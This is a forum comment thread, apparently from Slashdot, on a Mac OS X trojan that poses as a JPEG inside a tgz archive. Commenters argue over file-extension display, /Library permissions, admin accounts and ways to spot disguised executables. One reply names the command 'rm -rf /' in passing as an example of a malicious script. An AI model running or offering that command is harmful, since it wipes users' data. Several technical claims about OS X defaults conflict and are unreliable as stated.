a virus is actually an executable that attaches itself to other executables & runs whenever they run.

this is a trojan/worm, just like most malware that matches your incorrect description of a virus.

computer virus n. A computer program that is designed to replicate itself by copying itself into the other programs stored in a computer. It may be benign or have a negative effect, such as causing a program to operate incorrectly or corrupting a computer's memory.

http://www.answers.com/topic/computer-virus

Re:Trojan Man?

[Angostura]

Bold text? That's so pre-Quartz Xtreme.

Clearly executables should throb transparent, or jig about or ripple when you mouse over them or some-such. :-)

Re:Trojan Man?

Um, why is my /Library chmod 775?

What's wrong with that? You're not actually running as a user in the admin group are you? If so, that's what you need to change first; not permissions.

Re:Trojan Man?

[log0n]

It does, but it's turned off in Finder Preferences by default (no .ext is historical holdover from pre-OSX - never had them).

If it becomes an issue Apple will change (ie: in update 10.4.6 or something) the default to on.

Re:Trojan Man?

[cortana]

In which case, the program that created the file is broken.

Re:Trojan Man?

[bloodstains]

How is "display suspicious file" any different than opening suspicious file in a viewer like Preview on the Mac?

Its not.

Preview will not run an executable any more than the "display" command will. So how is the command line giving you more protection?

I tend to agree with you, however when using the GUI, people are more likely to simply double-click on the icon rather than specify to open the supposed jpeg in preview. It's not that the CLI is better than the GUI, as much as the default method of interacting with the CLI is different than with the GUI.

The real protection comes from being suspicious, in the first place.

Exactly.

Re:Trojan Man?

[tak+amalak]

On the Mac, you would open the Finder Preferences and check "Show all file extensions" in the Advanced tab.

Re:Trojan Man?

[Thalagyrt]

Pictures have headers, such as image/jpeg. The OS *can* determine it by that, but generally jpegs on OS X will have a .jpg or .jpeg extension. If you copy a jpeg over with no extension, in my experience the OS has no idea what to do with it. Us mac users use file extensions like everyone else!

Re:Trojan Man?

[Durandal64]

I am not saying executing the file it self. But if you download a .mp3 file does it play automaticly?

No.

Re:Trojan Man?

[Raffaello]

By default Mac OS X does not show file extensions of applications. If, like many more computer literate users, you elect to "show all file extensions" (Finder:Preferences:Advanced), this "virus" (which is actually a trojan of course) will show up as YaddaYadda.jpg.app and you'll see that it's just a lame attempt at a trojan.

That said, it will definitely bite many naive mac users who think they are invulnerable, and don't realize that the Finder's default behavior, though a convenience for the computer illiterate, is very dangerous precisely because it allows executable trojans to masquerade as data files such as graphics, etc.

Re:Trojan Man?

[mikiN]

First Rule in Malware Prevention: Never Trust a Pretty Picture.

Geez, I'd expect better from the MacOS developers. Enticing users to rely entirely on an icon to suggest the content and intention of a file is plain ridiculous.

One thing both Microsoft and Apple should have done a long time ago is overlay a marker (like a small gear) onto icons of executable files and make it very hard to disable it (like the arrow on Windows shortcuts). This, combined with a tiny little bit of education would have prevented most if not all of the great email worm and trojan pandemics of recent years.

Re:Trojan Man?

Here's a cluestick, kiddo:

• 0775 means everyone in the group can write to the directory. The correct permissions would be 0755 - nobody is talking about 0770, the group rights are the wrong ones.
• Worse yet, if the files have the same permission, everyone in the same group can modify them without a password - so at least 01775 would have been saner
• sudo su - requires a password; overwriting/adding files in a directory where you have write access does not

In case you didn't realize yet, the last point is what makes it possible for a virys/trojan to write files if run from the right group without requiring sudo access.

You don't think the admin group should be able to change the system library? That's your right, but it's not very logical. All admin users are one step away from root as su -s or sudo anyway.
So, chmod 755 won't help much as it will still just ask you for you password to make changes in Library.

No, it should not, without needing to provide a password. sudo su - , then changing, is ok, as it confirms the human in front of the computer is aware of the action. Again, with 0775 any program you launch can do it without having to su to root. It's hardly better than having c:\Windows writable only for power users, if your only user is in the power users group.

It's better to run as a non-admin user.

Ideally. In practice, for one's own desktop (the whole purpose of Macs) there's a trade-off. Why bother to disable root and use sudo if you need yet another layer of protection? And admin/wheel groups exist for a reason. But even a good security model can be botched by a poor implementation.

Re:Trojan Man?

[somersault]

yes, exactly, this is the same thing that causes quite a few viruses to succeed on windows machines also. It's almost funny to see a file called jpg.exe , but also just so sad that people fall for it because they have no clue about computers (and because they cant google for their own pr0n >_> )

Re:Trojan Man?

[transient]

Symlinks and aliases are quite different. You can move and rename the target of an alias, and the alias will still work.

Not terribly relevant, I know, but worth pointing out nonetheless.

Re:Trojan Man?

[Overly+Critical+Guy]

My file extensions show by default in all the OS X Tiger installations I've handled.

Regardless, this "virus" pops up an admin password prompt, like every other proof-of-concept OS X trojan that's been written in the past, which effectively stops it in its tracks. This isn't really news except to Apple-haters who can go "SEE NOW U'VE GOT VIRUSES LOLZ."

Re:Trojan Man?

[Shanep]

Open-apple + i (for get info) eliminates having to right or control click at all. :)

Just for the silliness...

I assume you meant option-apple + i. That is four button presses, as opposed to 3 for control clicking with a single mouse or 2 with a 2 or more button mouse. ; )~

Option-apple + i : Mouse click to select file (1), hold option (2) and hold apple (3) and then press i (4).
Control clicking: Hold Control (1) and mouse click file (2), mouse click Get Info (3).
Right clicking: Right mouse click file (1), mouse click Get Info (2).

Shit is this what happens when you become a Mac user?

Re:Trojan Man?

[j-pimp]

Open-apple + i

Does anyone call it open apple anymore. Isn't it pointless considering unlike the apple II there is no closed apple key.

Re:Trojan Man?

[qw(name)]

Possibly, but the whole point of this code is to be malicious. Why would a program create something that was intended to be executed by the user not set the executable bit? If anything, it could escape to a shell and make it executable, e.g. `chmod +x `. It's trivial.

Re:Trojan Man?

[Shanep]

Open-apple

Sorry, you meant the outlined Apple as opposed to the old outlined versus filled Apple.

So it's 3,3,2?

I really need to get to sleep. I think I've exceeded my stuff-up quotient for tonight.

Re:Trojan Man?

[CODiNE]

Seems suspicious of course, why would someone compress a JPEG? That's pretty odd, emailing a JPEG would let it show on the email but "Please unzip this image first to view" should raise a few alarms. Then again I'm sure plenty of "power users" regularly zip single image files before emailing them. ;-) That step was to both conceal that it wasn't an image and to keep the false icon on the executable.

Re:Trojan Man?

Aliases are basically the same as hard links, right? Hard links refer to file inodes, so you can move or rename the target file and the link will still work, unlike a symlink. I don't think hard links can go across partitions, though.

Re:Trojan Man?

Tar.gz files downloaded in Safari already warn you that it might contain an app.

Re:Trojan Man?

[moonbender]

I stand corrected. Thanks.

Re:Trojan Man?

[Ahruman]

Agreed. It is sufficient for administrators to be sudoers; there is no need for them to have write access to /Library (although mine is 755, for whatever reason) or, for that matter, to have write access to individual applications. I fully expect to be asked for an admin password to make any changes to these.

Re:Trojan Man?

[Ahruman]

On a Mac, you can use Get Info; for the trojan it should say Kind: Unix Executable File (PowerPC), as opposed to, say, JPEG Image. You can't expect casual users to do this for every file they download, though.

Re:Trojan Man?

[croddy]

That depends on the file manager you're using. I've not used Konqueror as a file manager recently, so I can't tell you much about KDE here. As for GNOME, Nautilus' default behvior is to generate a thumbnail of an image file. If something has a .jpg extension, and it's a binary executable with the execute bit set, Nautilus will fail to generate a thumbnail for it (your first clue). If you attempt to open it, Nautilus displays the following warning:

The filename "1.jpg" indicates that this file is of type "JPEG image". The contents of the file indicate that the file is of type "executable". If you open this file, the file might present a security risk to your system. Do not open the file unless you created the file yourself, or received the file from a trusted source. To open the file, rename the file to the correct extension for "executable", then open the file normally. Alternatively, use the Open With menu to choose a specific application for the file.

The only button in the warning dialog is "Cancel." In the case of a shell script masquerating as a jpeg, the behavior is the same. I'm kind of surprised this is still a problem on any platform, when the solution is so easy.

Re:Trojan Man?

[justin12345]

No, he meant open-apple, its what the command key was called back in the day of the Apple II. Back then there was also a close-apple key. Somewhere along the line the apple keys became command. I think that the second pictograph used on the key (the little tied off square) might have been the closed apple pictograph on some keyboards. I'm not sure though, as at least some keyboards used a filled-in apple for close-apple.

I still catch myself calling the command key the apple key or open-apple key when working with novice users. When you say command they get it confused with control about 80% of the time. Its easier to say apple since the key has an apple on it.

Re:Trojan Man?

It's been a while since I've done any Carbon programming (since before it was called Carbon) so my memory of aliases is fuzzy. But from what I remember, you're correct on a conceptual level, but aliases and hard links are implemented differently. At the file system level, an alias is no different from any other file. It has its own data, instead of simply sharing data with another file system entry. An alias is resolved to its target by system calls, while a hard link is "resolved" to its target by the file system itself.

I might have the wrong idea about hard links too, having used them once in my entire life. :-)

Re:Trojan Man?

A mac only uses file extensions as a last resort. Unlike earlier version of Mac OS, OS X does append them to files (so that windows users can actually have a clue as to the type of file.) Mac OS X still uses creator codes and file types (they are not the same thing at all). Windows only has type, there is no regard for creator (specifically which app created or last modified the file). In windows, you can't use multiple programs to open the same type of file by default. This is useful to microsoft, to push one particular application, but not to the end user. In OS X, the system tracks the creator, so you can open different instances of the same type of file depending on which program you prefer to use with that particular file. OR you can set it to open all versions of a given dot-3 extension with the same program, as in WIndows.

Re:Trojan Man?

[cortana]

If the program wanted to be malicious itself, there's no reason it would have to choose such a circuitous method to enact damage...

Re:Trojan Man?

just change the icon.

Re:Trojan Man?

[Myopic]

your comment is moderated as funny but i don't get the joke. right click on the file in the Finder, choose Get Info, and look at the Kind of the document, which will be an Application for any executable file.

is your joke about two-button mice? there are tons of two-button and more-button mice for Macs, and all Macs have supported those mice for, what, like a decade now. and mac users know that "right-click" is synonomous with "control-click". it's the same thing. in fact, isn't it silly that Windows users don't have the option to do that? (or, i don't know, maybe they do.) they can't even use one-button mice on their machines, those willy Windows people. Mac people can use any mouse they want and have full feature access.

anyway, so yeah, right-click, Get Info, check the file Kind. do that for any file you don't trust. oh, and if you open a JPEG and it asks for your password, don't put it in.

Re:Trojan Man?

[bogado]

It does not have 'helper apps'? It does not start the program bittorrent when download a .torrent? Does it run a plugin when the page states it to do it, like when you enter the site 'trailers.apple.com'?

Well if it does not do any of the above I would congratulate you. But my guess is that it does many of the above, at least in it's default state. Browsers today are very complex by them selves, html, xhtml, xml, css, canvas, mathml, svg, gif, jpeg, png and others are necessary (ok some of those aren't yet necessary) to handle by the browser it self. But beyond that there is java, quicktime, WMP, mpg, mp3, ogg and many, many, many other files that people want to be able to access in a somewhat seamless way in the web.

The browser has to rely on external viewers and plugins to handle those formats, and maybe other that are yet to be invented. I only think that there should be a sandbox arround all of that, so that when shit happens (and it will) at list you are already in the litter box. :-)

Re:Trojan Man?

[Myopic]

counterpoint: i HATE that dialog box. i wouldn't mind it if it came with a Don't Show This Message Again checkbox, but for some damn reason it doesn't.

yes, thank you Safari, i know i downloaded an application, i do it all the damn time. just shut up and unpack the archive. and while you're at it, tell your friend Mail to stop bouncing the dock and popping up dialog boxes every time it has trouble connecting to a mail server to send a message, just try again in a couple minutes and don't bother me.

Re:Trojan Man?

man file

example
[anonymous@coward ~]$ file foo.png
foo.png: PNG image data, 100 x 100, 8-bit colormap, non-interlaced
[anonymous@coward ~]$ file bar.jpg
bar.jpg: JPEG image data, JFIF standard 1.01

Re:Trojan Man?

[Sir_Cockalot]

That could be one way to solve the issue. Another way is to inform the user they are downloading an executable file.

Re:Trojan Man?

[PitaBred]

The problem is that so many people think that their macs are unassailable, so they don't think twice about typing in their password. This wouldn't be seen in the wild if they didn't.

Re:Trojan Man?

[Firehed]

While I'd have to agree (it did get me once, but that's what I get for taking my IT department seriously, the inept bastards), anyone who renames files more than once a month realizes how useful it is to not have to retype the extension a thousand times. And let's face it - most of the people getting viruses on windows don't know the difference between .jpg and .exe anyways. I think a "show extensions but don't change/highlight them on renaming" would be the best way to go about things, as you keep the convenience and gain that little bit of security.

Of course, I'd bet that the "first" Windows XP virus was the writer being sneaky too. It's after the flaw/feature/whatever went unchanged for half a decade that people start needing to lay into them.

Re:Trojan Man?

[jessecurry]

no, he meant Open apple + i
Open apple is the same key referred to as the command key.

Re:Trojan Man?

[PitaBred]

But Linux DOES have extensions. All my jpeg's end with .jpg or .jpeg, and I can tell they're jpegs by that. It's just that executable files by default don't have (or need) the extension. You can just about assume that any file without an extension in Linux is executable. But like other people in this thread have said, you can just use the file command, or look up the properties in your file manager. OSX, I'll let others speak for it. I've used it a bit, still don't like it.

Re:Trojan Man?

[yabos]

You could easily name a program with the .jpg or whatever extension and chmod +x on the file and it's still executable. Extensions on anything but Windows don't really mean a whole lot.

Re:Trojan Man?

[hunterx11]

Actually, you're right; they simply changed the default to show all file extensions.

Re:Trojan Man?

[HTTP+Error+403+403.9]

I thought if you double-clicked an application for the first time, OS X brings up a dialog box stating that this is the first time you have opened this application and if you want to continue.
Is this still the case? Or did this trojan find a way around it?

Re:Trojan Man?

[hackstraw]

In the meantime, I'm going to be doing a lot of "sudo chmod 755 /Library".

To be safe, and to protect yourself from your local admins, I would do "sudo chown -R root /Library; sudo chmod go-w -R /Library".

Personally, I wouldn't worry about it. A socially engineered trojened executable can be launched or stored just about anywhere. I don't see what is so special about /Library.

Re:Trojan Man?

[cadaeibfed]

You can turn off this warning by unchecking 'open safe files' in Safari>Preferences>General.

Re:Trojan Man?

[cmdrbuzz]

Actually, I get the impression that this is an old-style Mac executable, which does not use the .app extention.

I don't think your right on this because it is distributed via a tar archive, and I don't think that tar can handle the resource fork required to have the file-type set to APPL.
And if you Get-Info on the file, however it may be an executable, it will clearly indicate that it is not a document.

Oh, and the +x access to the file is coming from the tar archive, just the same as it would on any UNIX style OS.

I think Apple may need to make it *really* obvious that this is an executable, and your about to do something that could be really dumb, but I don't know what they should do, without making it another 'everyone just clicks OK, doesn't read the message'.

Re:Trojan Man?

"Right"-click?

I'm a lefty and have my buttons reversed, you insensitive clod!

Re:Trojan Man?

[MoneyT]

I would think most people would think twice about having to type in their password to open a picture, but maybe I'm just too optimistic. Of course, for people like that, no ammount of protection short of a knowledgeable human looking over their shoulder 24/7 will save them.

Re:Trojan Man?

[GlassHeart]

it will definitely bite many naive mac users who think they are invulnerable, and don't realize that the Finder's default behavior, though a convenience for the computer illiterate, is very dangerous precisely because it allows executable trojans to masquerade as data files such as graphics, etc.

Even if it was clearly marked as an executable, how many of these naive users do you think will run it anyway given the promise of free porn or something?

Re:Trojan Man?

[javaxman]

That said, it will definitely bite many naive mac users who think they are invulnerable, and don't realize that the Finder's default behavior, though a convenience for the computer illiterate, is very dangerous precisely because it allows executable trojans to masquerade as data files such as graphics, etc.

This is true... except for the fact that when you download an uncompressed file, or uncompress the file, it's noticed as being an application, so you get this dialog along the lines of "Such and such is an executable, do you want to download it"... and apparently if you're not an admin user, this one tries to install something in /Applications or somewhere else where you end up looking at an authentication dialog, at which point you're likely to wonder WTF. Unless, like you say, you're a naive mac user who's used to alwasy saying OK to anything.

This will get plenty of folks to stop using their Admin accounts so much, though. I know I'm guilty of using my Admin account all the time ( looks around sheepishly ) and was waiting for just this type of event to stop doing that. Lucky for me it's easy enough to create a new account, designate it as admin, and change the permissions on the account I regularly use...

Damn, I have to do that at work, too. Stupid trojan writers.

Re:Trojan Man?

[GlassHeart]

Maybe we should be able to override the OS so that no matter what icon the executable file says it wants to display, the OS always shows an icon clearly depicting the fact that the file is an executable.

...so that when you look in the Applications directory, you see a hundred identical icons?

Re:Trojan Man?

Disclaimer: not a Mac guy...

1) View the properties.
2) From the command line run "file X"
3) Try to open the file in a jpeg viewer

Security tricks:

1) If you download the file, it should not be executable by default: in *nix, you don't make a file executable by the extension...it is a permission you have to set.

2) The problem will only arise if you are using one specific JPG icon. If you use a different viewer or otherwise change the associated icon, the file will be visibly different from all of your other jpgs.

3) You could schedule a regular job to check for odd permissions like executable jpgs. This might be a bit much for the average user but you can expect to see this as a default setting at some point in the future.

Re:Trojan Man?

[RemovableBait]

I think a "show extensions but don't change/highlight them on renaming" would be the best way to go about things

Microsoft obviously thinks so too, because this is the default behaviour in the current Windows Vista CTP builds. I'm not sure how difficult it could possibly be for them to add this function to XP with a non-critical update.

Re:Trojan Man?

[greed]

Apple got very vigorously ripped on for switching to Windows-type file suffixes and hiding them by default when the OS X Public Betas came out. There was some amount of yelling going around before that with the Developer Previews. Google should be able to find it for you. The concession Apple made at the time was the addition of the "Show extension" or "Use extension" checkboxes. (And some of the "Use extension" ones just cause the Save dialog to show the extension it will add--it always adds one.) Damn it, we liked type/creator, all they needed was a way of configuring a way to open a given type in a particular app rather than the creator app, and everyone could be happy. (Like having most things open in the creator, but all jpegs and gifs open in your favorite viewer.)

I believe as of Tiger the default is no longer to hide extensions, but I've never run a fresh install of Tiger, only upgrades from Panther (from Jaguar (from Cheetah...)).

But, even with Windows-type suffixes, you still have to deal with UNIX Execute permission and have a well-formed executable. (Yes, I know Windows NT and NTFS have an execute permission, and the kernel obeys it. It's just set to ON on every file I've ever seen, except where I've explicitly cleared it.)

What this means is that Apple has an excellent opportunity to somehow make program and data files visually distinct. Use the X bit, the TYPE code, and/or the file header to highlight "clicking on me starts a new application" somehow. Overlaid gear icon? Obviously you have to mark applications, if you mark data as "safe", then someone just has to fake up an application icon with the "safe" mark.

Now you've still got Carbon and Classic-created files which have their X bits turned on by default because the APIs didn't exist--that default really should be changed to X bit OFF. After all, how many Carbon and Classic applications create executable files? Someone writing shell scripts in a Classic program is going to know how to deal with missing X, I hope. (As long as the interface layer preserves X on overwrite, this would be like having to chmod +x your new shell script on standard Unix.)

Re:Trojan Man?

[mrchaotica]

My file extensions show by default in all the OS X Tiger installations I've handled.

Except for certain ones, like .app, .bundle, etc.

Re:Trojan Man?

[raddan]

When you run file on an application bundle, file tells you that it is a directory. Which it is. So this isn't an obvious help to a newb.

Re:Trojan Man?

Many ways to find the extension:

1) Finder -> Preferences -> check "Show all file extensions"
or
2) Select file in Finder window and "Get Information" (cmd-i)
or
3) Select file in Finder window, set to view "Column" (cmd-3), and select file. (File info appears in next column)
etc.

Re:Trojan Man?

[qzulla]

That's not to say that you can't have root-like privs -- the default first user on a Mac is an "Administrator," which just means that they can sudo -s and become root temporarily. However to do this you have to authenticate for every action. (Or every 5 minutes or so.)

Nope. Once you sudo -s to a root shell it is yours forever and ever. You are thinking of sudo a_command. There is the timer on that method.

qz

Re:Trojan Man?

[Ford+Prefect]

If, like many more computer literate users, you elect to "show all file extensions" (Finder:Preferences:Advanced), this "virus" (which is actually a trojan of course) will show up as YaddaYadda.jpg.app and you'll see that it's just a lame attempt at a trojan.

Actually, it seems that (as of 10.4.5, anyway) it'll show as 'YaddaYadda.jpg.app' even if you have the 'Show all file extensions' switched off - a bit of experimentation shows that if the first extension (in this case '.jpg') is a recognised file-type, then the '.app' gets shown as well.

So, from a display point of view:

• YaddaYadda.app -> YaddaYadda
  
• YaddaYadda.foo.app -> YaddaYadda.foo
  
• YaddaYadda.jpg.app -> YaddaYadda.jpg.app
  
• YaddaYadda.pdf.app -> YaddaYadda.pdf.app
  

... and so on.

Basically, if it's trying to impersonate another existing file-type, it'll tell you.

Re:Trojan Man?

[Diordna]

Actually, if you try to open any app for the first time, it asks you first.

Re:Trojan Man?

[Diordna]

Actually, there are 3 different kinds of Mac executables.

1. The "package" format you just mentioned, which is a folder structure with a UNIX binary in it, which is what most OS X binaries are 2. A UNIX binary, no package, which a lot of OSS uses 3. A Carbon app, which will also run in OS 9, which no one uses anymore

You can change a plain ol' UNIX binary into a package by creating a certain folder structure and renaming the main folder thingy.

Re:Trojan Man?

...alongside prompting the user before running the executable for the first time (as is currently the case).

;P

Re:Trojan Man?

[Petrushka]

How do you turn on file extensions in OS X? I don't normally use a Mac, so I don't know this, but obviously it would be useful to know for when I do.

Re:Trojan Man?

Something like this in the code that unpacks tar files would go a long way toward fixing it.

This is already the case. For this "virus" to take effect, you have to dismiss that dialog. In other words: you were warned.

Re:Trojan Man?

unless, of course, this is the correct behavior, like, say, a tarball that preserves the file rights.

Now, double-clicking on a tarball that launches a exe automatically is a different issue ... such a helpful OS would remind one quite a lot of Windows/Clippy.

Re:Trojan Man?

[dr.badass]

I've seen Windows' "hide extensions for known file types" option described as an OS flaw in the past

The complaint is usually that not only does Windows hide extentions, but it doesn't let you modify them. Since extentions are the only way that Windows determines file types and associations, this is an incredible pain in the ass. In Mac OS X, not only can you change hidden extentions, but you rarely need to because associations can also be determined by type/creator codes, MIME types, and Uniform Type Identifiers.

So, it's not really the same thing.

Re:Trojan Man?

IMO tar should have a separate flag that tells it to preseve the potentially dangerous execute permission.

Re:Trojan Man?

[leenks]

Windows users get a key that does the same as right clicking (the Context key, seen here on the right. If you want to use a single button mouse you can, but quite why the hell you would want to is beyond me!

Re:Trojan Man?

[zsau]

On GNU/Linux, there's no general way that always works; the exact method depends on what environment you choose to use.

In general, executable files have a piece of metadata set that makes them so. Whether executable bits over-ride the other ways of determining the file-type is up to the environment...

Many environments use extensions for others, so that executables will have no extension, but jpegs will be .jpg and so forth. Most software that have a file open dialog box will filter by extensions, though not all of them do. Extensions are rarely if ever hidden, but they're much less necessary so I have no problems with creating an Gimp image called "Flag of Victoria" instead of "Flag of Victoria.xcf". Still, most files intended for public distribution have extensions.

Many environments will look inside a file to determine its type. This way, if you get a file named "frog.jpg" but its contents is actually ASCII text (e.g. for a shell script or to launch a vulnerability in the JPEG libraries) it'll show up as an ASCII text file and the system will alert you to a possible security problem.

Some file systems have metadata for file types as well; some user environments will use these.

HTH!

Re:Trojan Man?

[Durandal64]

It does not have 'helper apps'? It does not start the program bittorrent when download a .torrent? Does it run a plugin when the page states it to do it, like when you enter the site 'trailers.apple.com'?

Uh, well yeah, it supports plug-ins. But that's not what you asked. When I download an MP3, it doesn't automatically open in iTunes.

Re:Trojan Man?

[NutscrapeSucks]

Oh, and the +x access to the file is coming from the tar archive, just the same as it would on any UNIX style OS.

So basically all this talk about Execute permissions being a protection agains trojans on *nix is a heap of shit then?

Re:Trojan Man?

[bogado]

Ok, so I had choosen a bad example. :-) But I guess you got my point, didn't?

Re:Trojan Man?

[Myopic]

but then safari wouldn't unpack the archive. i still want it to do that, i just don't need to be told that the archive contains an application. many annoying messages in different programs have a little checkbox for "Don't Show This Message Again", and it's unconceivable why this particular message doesn't have that.

Re:Trojan Man?

[Myopic]

why you would ever want to is beyond me, too, and why it took apple twenty years to release one is unimaginable to me. nevertheless, two-button mice cost under ten dollars, so anyone who can afford a Mac can afford a two-button mouse if they want one.

thanks for the point of order re: the context key. (do all keyboards have that?) see? why is anyone complaining? both Win and Mac have it both ways -- consumer choice! have it any way you want it!

Re:Trojan Man?

[leenks]

Not all keyboards have it, but all those made for Windows95 and later will do (except laptop keyboards that seem to often ommit it). You can always bind it to another key using the MS keyboard layout creator (if you know about the tool and where to download it!). Or just use a two button mouse.. personally I miss paste on the middle button though if I do that :-)

Re:Trojan Man?

[mr100percent]

Enticing users to rely entirely on an icon to suggest the content and intention of a file is plain ridiculous.

Well, I'm sure people would wonder why they have to enter their system administrator password in order to VIEW a picture.

Re:Trojan Man?

[mr100percent]

I believe they already have badges for all the Applescript compiled scripts.

OS X is already secure enough that when you double-click on a new document it says "This will open (some application) that has not been run before on this computer. Are you sure?" and you have the option to view the location of the application, run it, or cancel.

Re:Trojan Man?

http://www.f-secure.com/v-descs/inqtana_a.shtml/

Re:Trojan Man?

[Starxxon]

Actually, if you try to open any app for the first time, it asks you first.
I feel like I'm repeating myself, but it doesn't display any dialog in this particular case. It should though and I hope Apple fixes this.

Re:Trojan Man?

[Grail]

How about... we have a new option (or two) for file systems, one which says to the operating system, "nothing on this volume is supposed to be an application, stuff on this volume is end-user data only!"

We could call it the "No Applications" flag (or NOAPP for short).

Then you could make sure that user's home directories (and in fact, all user-modifiable directories) are on volumes mounted with the NOAPP flag.

Though I guess Unix aficionados would want to used the term "executable" rather than "application"... so we'd have to have a "NOEXEC" flag.

Oh wait...

noexec Do not allow execution of any binaries on the mounted file system. This option is useful for a server that has file systems containing binaries for architectures other than its own.

Now I just have to find out if Mac OS X honours this for application bundles...

Re:Trojan Man?

[Grail]

To work properly though, Apple would have to ship Mac OS X as follows:

• Have an administrator account pre-configured
• Require the user to set up a limited user account as their first task with turning on the machine, immediately following the notification about the administrative user (ie: the administrator account is xyz, please enter a password that will be required for performing administrative operations on this computer)
• Have /Users on a separate partition which is mounted noexec
• Hope that users don't go circumventing these protection measures to run trojans posing as screenshots of 10.5...

But how do you go about educating non-geeks about computer security fifty words or less?

It's not a virus...

[xwizbt]

Note the following from http://www.ambrosiasw.com/forums/index.php?showtop ic=102379 :

You cannot be infected by this unless you do all of the following:

1) Are somehow sent (via email, iChat, etc.) or download the "latestpics.tgz" file

2) Double-click on the file to decompress it

3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file, and then open it.

Re:It's not a virus...

[slungsolow]

If I have to type in my System Admin password to intall it, then I don't consider it a threat. This seems like a rather lame attempt at a vulnerability. The folks who would be interested in screenshots of 10.5 are the kind of folks who know an archive of photos does not require an admin password.

Re:It's not a virus...

[pulse2600]

Um, this sounds very similar to a variety of Windows vulnerabilities...why aren't people jumping down Apple's throat about their insecurity as well? Or should OSX be held to a different standard than Windows?

Windows malicious graphic flaw comes out: OH NOES MICRO$OFT IS TEH EVIL SUKK0RS!!!!111!one

MAC OSX malicious graphic flaw comes out: "You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file, and then open it."

BTW I am not trying to attack the parent, just using his words as an example of how many people perceive security issues based on what OS is affected. Based on the parent's analysis of the vulnerability I believe he would apply the same logic and risk assessment if this was a Windows flaw.

Re:It's not a virus...

[strider44]

Hmm reading the article and the forum threads it seems that the trojan wrecks the user account should it be run, so you don't have to enter the Admin password.

In other words MacOSX is giving *some* protection in that it can only attack the user that runs it, but that protection is shallow comfort. KDE has the best approach I think in this in that every executable, no matter what the extension etc, has the same executable icon. It also doesn't have automatic autoplay (possibly the worst "feature" of Windows). The icon of course in this case is what the trojan is exploiting.

I'm not sure about this though, but don't Macs like KDE instead of showing an icon for JPEGs show a preview of the picture instead of a standard icon?

Re:It's not a virus...

[slungsolow]

you missed the part about typing in an admin password. windows doesn't have that additional layer of security on it. You can unarchive and open it under any user account. It will infect the whole computer. with a mac, you can unarchive it and attempt to open it with any user account. but in the end, you can't actually open it without root access. any computer user should immediately suspect something when a jpg requires your system admin password (and I believe in this case it would require the sys admin username and password).

Re:It's not a virus...

[minus_273]

"MAC OSX malicious graphic flaw comes out: "You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file, and then open it.""

maybe because it is not a flaw. There have always been malicious program for OSX the rm -rf / script comes to mind. But like all of them, you have to manually download, decompress, run it and then type your admin password. That is not a flaw.

Re:It's not a virus...

Um, this sounds very similar to a variety of Windows vulnerabilities

Um, this sounds nothing like any Windows vulnerabilities at all, ever. This is a trojan, and can be done on any Operating System ever. It's like someone sending your Windows using ass an executable over AIM with the message "LOL this si teh gretats game EVAR!!!1!1" and you running it as a local Administrator. How the fuck would that be Microsofts problem?

Based on the parent's analysis of the vulnerability I believe he would apply the same logic and risk assessment if this was a Windows flaw.

Based on my analysus of your post, I believe you're a dumbass. I say that as a non-Mac user, by the way.

Re:It's not a virus...

[pubjames]

Can you explain to me where the security flaw in OSX is in this case?

There is no double standard here.

Re:It's not a virus...

[hattig]

You have to admit though that many Mac users would like to see Panther pictures, and this is a good way of propagating the trojan.

What can you do about it? User education is the only way.

Otherwise, mark downloaded files as 'downloaded', and when unzipping such files apply that to all files inside too. Upon first access to an 'downloaded' application you should ask the user if they want to run the application. For a real data file there's no issue, it'd open in Preview, etc. It would catch applications pretending to be datafiles though, and equally it wouldn't stop terminally retarded people running it. Hopefully other people would go 'hang on, this isn't an application...' and thus save their computer.

Re:It's not a virus...

[confused+one]

Yes... Unfortunately the Windows user world has shown that more than enough people will

1. download it

2. double-click and decompress it.

3. double-click and execute it.

Re:It's not a virus...

The image preview as icon is an option you have to enable, but yes, there is that option.

Of course, that would simply mean that any old pretty-picture icon would do the same job as the jpeg icon...

Re:It's not a virus...

[WhiteWolf666]

It's not a malicious graphic flaw. It's an executable file, for christ sake.

It does not use the Operating System's JPEG handling code. Its an executable, like any other. Running this program is no different than dragging your home directory to the trash; both require user stupidity.

Re:It's not a virus...

[Shishak]

Um.. no, completly different

In the windows scenario you have a real .JPG image which contains code insdie of it that crashes the Windows JPG image library. The code in the image is then executed. In essence in windows a .JPG image file can become an executable running as user admin. This executable now has full access over your computer. This image can be embedded in an e-mail/web page and will execute, launch and own your machine with having you do anything but go to a website or read your e-mail

In the Mac scenario you have an executable which is made to look like an image because its icon was changed. The computer itself knows that it isn't an image so it doesn't try to load it automatically from e-mail or web. This 'virus' is designed to trick the user. The user needs to double click and run the executable. It will then try to write into a protected directory and the OS will prompt the user for the admin password. If the user is dumb enough to click on a executable *and* enter the admin password there really isn't much else you can do. The executable never actually crashes any part of the OS to gain control of the OS and do something that the user doesn't authorize.

Re:It's not a virus...

[bogado]

Even better, I think is not to allow direct execution from the desktop shell. If you want to execute something make a 'desktop' file pointing to it. Also don't permit desktop files to have relative URLs, if this was possible an atacker could send the .desktop file with the executable in the same compressed file.

Re:It's not a virus...

You don't need to type in your admin password to install it. The default user account on OS X is the admin user, who already has rights to write to many files in /Library/ and /Applications/. Most users don't know that they shouldn't use this account except to install software, because the system setup that ran when they bought their Macs welcomed them to use it!

Re:It's not a virus...

[lenhap]

Macs do show a preview of the picture instead of the icon for JPEGs IF the user has clicked on the file in the finder window (the three panel view), in which case it also will have text telling the user the type of file. In this it would continue to display the JPEG icon instead of showing a preview of the picture and the text would tell you it was an "application (powerpc)" or something like that.

Another thing of note is that if this file was downloaded through safari, safari would attempt to uncompress the file and then warn the user that there are executable files in the compressed file, asking if the user wants to continue (uncompressing the file). So if it was downloaded through safari, the user would be notified of the file's applicationess vs. normal jpegness. Also, safari does not ever execute downloaded files for the user. I am not certain, but I would guess that using iChat would do the same with a downloaded/transfered file. Also, apple has a finder option to always display the file extension of every file (off by default) which would make this file be titled something like "newOSpreview.jpeg.app" which would hopefully catch the user's attention. One other thing to note is that if the user downloaded the file using safari, the default save location is the desktop which would mean the user wouldn't get the aforementioned preview of the file if they clicked on it (or double clicked).

